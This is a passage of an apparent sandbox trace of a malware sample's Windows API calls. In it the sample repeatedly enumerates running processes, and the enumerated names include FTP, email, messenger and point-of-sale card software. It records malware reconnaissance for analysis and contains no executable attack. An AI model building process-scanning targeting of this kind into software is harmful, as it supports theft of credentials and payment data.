lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0293.401] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0293.405] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0293.407] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0293.409] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0293.410] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0293.412] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0293.413] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0293.415] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0293.416] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0293.437] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0293.439] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0293.440] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0293.442] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0293.444] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0293.446] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0293.451] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0293.453] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0293.455] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0293.457] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0293.459] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0293.460] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0293.462] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0293.467] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0293.468] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0293.470] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0293.472] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0293.474] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0293.481] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0293.482] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0293.484] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0293.486] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0293.488] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0293.490] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0293.491] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0293.493] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0293.498] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0293.500] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0293.501] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0293.503] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0293.505] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0293.506] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0293.508] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0293.510] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0293.520] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0293.522] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0293.532] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0293.534] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0293.536] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0293.537] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0293.539] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0293.541] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0293.545] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0293.547] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0293.548] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0293.552] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0293.553] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.555] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0293.557] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.562] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0293.564] CloseHandle (hObject=0x224c) returned 1 [0293.564] Sleep (dwMilliseconds=0x64) [0293.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0293.769] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.771] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.773] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.775] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.779] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.781] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.783] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.784] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.786] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.787] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.789] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.790] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.902] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.904] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.905] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.907] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.909] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.911] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.912] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.914] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.915] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0293.920] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0293.922] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.923] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.925] Process32Next 